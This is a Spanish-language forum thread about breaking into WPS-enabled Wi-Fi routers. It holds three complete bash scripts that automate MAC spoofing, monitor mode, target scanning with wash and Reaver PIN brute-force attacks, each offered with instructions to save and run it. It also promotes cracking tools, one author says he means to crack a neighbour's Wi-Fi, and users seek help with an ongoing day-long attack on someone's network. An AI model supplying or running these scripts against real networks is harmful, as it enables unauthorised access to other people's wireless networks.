Deberías haberlo posteado en el hilo correspondiente.
1.- Reaver-WPS es el que hace todo el trabajo, WPSCrackGUI, Infator, Reaver-PRO, etc. son simplemente entornos gráficos agradables para el usuario con extras. 2.- Depende del Router. 3.- Puede tardar una eternidad! 4.- Donde quieras, por lo generar prefiero usar un linux a mi medida. 5.- Únicamente por diccionario WPA.
He encontrado dos scripts bash que todos pueden utilizar. Uno es de j0k3rr1 otro es de Vinay Gopinath y finalmente, el último es de hackling de Hak5 foros. Simplemente pegue el código en Ubuntu o Backtrack en un nuevo documento y guardarlo como un archivo. Sh. Entonces chmod 755 el archivo y ejecutarlo.
j0k3rr1
Código:
#!/bin/bash # This is a linux bash script i wrote that runs best on Backtrack 5 KDE # It automates reaver WPS bruteforce attack. simply save it to a text file (remove the .txt extension make #it .sh) # then chmod +x <thefilename> and run it ./<filename> # enjoy
# Attack WPS enabled routers
clear tput setaf 2; echo "##################################################################################" tput setaf 2; echo "# ~Automate reaver WPS attack Bash script written by j0k3rr~ #" tput setaf 2; echo "# 1-Tested on Backtrack 5 KDE #" tput setaf 2; echo "# 2-Make sure your wifi card is plugged in before starting the script #" tput setaf 2; echo "# 3-Any problems with the script feel free to contact me on twitter @j0k3rr1 #" tput setaf 2; echo "# #" tput setaf 2; echo "# #" tput setaf 2; echo "# #" tput setaf 2; echo "##################################################################################"
tput setaf 1; read -p "Press [Enter] to start hacking..."
tput setaf 2; read -p "Whats your Wireless interface? (Should be listed in red above) " winterface
# increase TX power to 30 dBm for wifi cards that can hanlde the shiznit
tput setaf 2; echo "Would you like to increase the TX Power of your wireless card to 30 dBm? Y/n" read a if [[ $a == "Y" || $a == "y" || $a = "" ]]; then iw reg set BO iwconfig $winterface txpower 30 else echo "continuing without changing the TX power" fi
# Spoof Mac Address and put card into monitor mode tput setaf 2; echo -e "Would you like to spoof the MAC address of your wifi card? Y/n"
read b if [[ $b == "Y" || $b == "y" || $b = "" ]]; then wmac=00:11:22:33:44:55 airmon-ng stop $winterface ifconfig $winterface down macchanger --mac 00:11:22:33:44:55 $winterface ifconfig $winterface up tput setaf 1; airmon-ng start $winterface else tput setaf 1; echo "continuing without changing the mac address" tput setaf 1; airmon-ng start $winterface fi
#!/bin/bash clear echo "This script makes it easy to start a reaver attack" echo "" echo "[+] Do you need to setup a monitor interface? [y/n]" read setup if [[ $setup == 'y' ]]; then #Setup the monitor interface echo "[+] What Wireless interfaces do we have..." iwconfig echo "[+] Please select an interface to place into Monitor Mode [wlan0]" read interface if [[ $interface == '' ]]; then interface=wlan0 #Default to wlan0 fi echo "[+] Starting monitor Mode for $interface" airmon-ng start $interface iwconfig fi #End Mon Mode Setup Portion #Start part of script that executes regardless echo "[+] What monitor interface should I use? [mon0]" read monInterface if [[ $monInterface == '' ]]; then monInterface=mon0 #Default to mon0 fi #Spoof the Mon Mac echo "[+] MacSpoofing $monInterface" ifconfig $monInterface down macchanger -r $monInterface ifconfig $monInterface up #Check for Targets echo "" echo "[+] ------------------------------------------------------[+]" echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]" echo "[+] ------------------------------------------------------[+]" wash -i $monInterface #Set Reaver Target echo "[+] What is the MAC for the target AP?" read target #Set optional functions reaver #to show the options available in terminal echo "[+] reaver -i $monInterface -b $target" echo "[+] Type any other reaver options you'd like besides the above" read reaverVars #Start REAVERINGGGGG!!!! echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)" reaver -i $monInterface -b $target $reaverVars #Stop Monitor Mode Interface if the script set it up if [[ $setup == 'y' ]]; then echo "" echo "[+] killing Monitor Interface" airmon-ng stop $monInterface fi
#CONFIG: Customize the script according to your needs #The default wireless interface (usually wlan0, wifi0 or ath0) wireless_interface=wlan0
#The timeout (in seconds) for wash to search for WPS-enabled access points wash_timeout=15
#Flag to allow user to choose target AP allow_user_choice=1
#Delay between attack attempts reaver_delay=0
#Check for root privileges if (( EUID != 0 )); then echo "This script needs root" exit 1 fi
#Check for required commands for command in airmon-ng wash reaver do if [[ -z $(which $command) ]]; then echo "$command was not found" echo "To install $command, you may follow this link" echo "http://lmgtfy.com/?q=$command+installation" exit 1 fi done
echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"
#Check available interfaces and close previous monitor interfaces and wireless lan for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:]) do if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then echo "* Shutting down $interface" airmon-ng stop $interface > /dev/null fi done
echo "* Starting a new monitor interface mon0" airmon-ng start $wireless_interface > /dev/null
WIFI-Cracker es un script que automatiza la AUDITORIA de las redes wifi. Está completamente creado por Mr. Penguin, de hecho lo hice hoy.
Es una prueba de concepto y se creó con fines educativos (ya que yo estaba aprendiendo sobre wifi). Tengo la intención de hacer mucho más de agrietamiento WIFI de tu vecino porque honestamente que es fácil para mí ahora. En la actualidad, quiero añadir algunas opciones más craqueo a la escritura, así como un menú Dauth. Te agradecería si alguien quiere contribuir en este proyecto.
Características - Mac Spoofing con macchanger - Target exploración con airodump-ng - Cracking WEP y WPA / 2 (con aircrack-ng y reaver) - Menú Depurar para corregir errores - Un montón de cosas pequeñas para que el guión tan bueno como se puede ser Packet sniffing menú con tshark y Wireshark * NUEVO * - Updater función * NUEVO * - Continuar sesión anterior WPA hackear * NUEVO *
Actualización 2: v1.2.2 está en marcha con un montón de correcciones desde 1,2 y la posibilidad de reanudar las sesiones de Reaver.
ACTUALIZACIÓN: Esta es la nueva versión 1.2 WIFI-CRACKER donde muchas cosas se han solucionado y ha añadido unos cuantos. Las nuevas funciones incluyen una actualización y un menú de detección de paquetes. Enlace de descarga Igual que antes, y no necesitará nunca físicamente usarlo nunca más.
Es un poco preocupante sin embargo. El sitio web parece que están realmente detrás del dinero, en lugar de desarrollar una comunidad. n1tr0g3n que se sugiere: http://www.n1tr0g3n.com/?p=1932 dice que lo compró y "es la mejor galleta wifi hasta ahora" tiene enlaces del menú a la tienda de sombrero de copa-sec.com y un foro para que apesta un poco. Él debe tener un descargo de responsabilidad completo.
En primer lugar, no es sólo para los miembros que cuesta un mínimo de $ 6.99 al año: http://shop.top-hat-sec.com/Memberships_c2.htm Aunque usted puede comprar sin una membresía, usted recibirá reembolso porque no lo hace tienen una membresía.
En segundo lugar, es mejor obtener el curso WEPWAP que es de $ 19.99, y si desea que el vídeo en DVD, usted tiene que pagar el envío también. WEPWAP sólo software (sin instrucciones de cómo usarlo) en sus propios costes $ 9,99.
Por lo tanto, ser transparentes acerca de los costos y lo que obtienes .... desnudo mínimo, tendrá que pagar $ 6.99 + $ 9.99
WepWap1.5 instrucciones para su correcta instalación
El programa consta de WepWap1-5.tar.gz, WepWapsetup1-5.sh y WepWap1 5.txt-Asegúrese de descargar los 3 WepWap1-5 archivos y colocarlos en el escritorio. Así que usted pulse Guardar y cambiar la ubicación de la raíz a Desktop. No extraiga. No haga ninguna carpeta que el programa está diseñado para hacerlo todo por usted. Sólo tiene que abrir el archivo Readme.txt y siga las instrucciones y se establecerá!
Tenga en cuenta que cuando el programa intenta descifrar las claves inalámbricas de punto de acceso, se guardará una copia de la grieta y decir "la clave ha sido guardado" independientemente de que la grieta se ha realizado correctamente. En la terminal, el programa mostrará si fue o no exitosa.
Hemos añadido una nueva función para el Programa WepWap y se movió un par de cosas a su alrededor. WepWap1-5 viene con Reaver. Reaver no es nuestro programa y tiene un montón de errores. A veces funciona ya veces no. Cuando funciona, funciona genial! Hay algunas secciones del foro sobre Reaver. La mayoría de las veces, el problema viene cuando no sea lo suficientemente cerca del punto de acceso o demasiado cerca (sentada junto a él). La funcionalidad de Reaver también depende del tipo de tarjeta inalámbrica que tiene. Lamentablemente, no tenemos control sobre esto.
Si tiene Backtrack 5 R2 o posterior de lo que ya viene con Reaver. Si usted no tiene Reaver, que estará en la carpeta WepWap1-5 después de haber seguido las instrucciones y sólo tendrá que instalarlo.
Por favor, tenga en cuenta: El programa WepWap1-5 sólo se ejecutarán en Backtrack KDE / Gnome de 32 bits. No va a funcionar en 64 bits.
Renuncia: * WepWpa, WpaPy y WePpy son todos los programas registrados de Top-Hat-Sec. Al descargar cualquiera de estos programas, usted está de acuerdo que usted no podrá copiar o distribuir todo o parte del programa (s) sin la autorización previa de los fundadores del Top-Hat-Sec. Usted es libre de guardar una copia de seguridad del programa (s) para su uso personal.
Hola a todos, llevo un día intentando sacar una pass y me gustaría que me dijeseis un par de cosas :
- Hace unos minutos se ha cumplido 24 horas desde que he empezado a utilizar reaver con una red de ONOXXXX cuya MAC empieza por 00:21:B7.... , va por el 16% a una media de 52 pin/sec y he leido por aquí que a la gente le tarda bastante menos, no tiene que llegar al 100% a este ritmo verdad? Me refiero a que si encuentra el pin en el 20% por ejemplo ya termina, no?
- En caso de pausar el proceso, hay que guardarlo obligatoriamente ? O si me fijo en el ultimo pin que ha probado y empiezo otro ataque desde ese mismo continua ahí?
Pues uso una tarjeta alfa de 1w con el chipset rtl8187L ,confirmado.. Todavia no he usado el wash pero he seguido los pasos para saber si esta activado en base al video de manejo de reaver que sale en la pagina de wifiway, que basicamente se trata de hacer una captura y analizarla con el wireshark y tiene que poner en una parte 0x02 y si que me sale 0x02 igual que en la otra que si consegi obtener, si quereis mas detalles mañana arranco otra vez y ejecuto el walsh y os paso el video
No cambiara en nada por mas que le pongas una antena de 2222dBi.. todo depende tanto de tu lado como del lado del router y/o equipamiento del otro extremo para que se vean.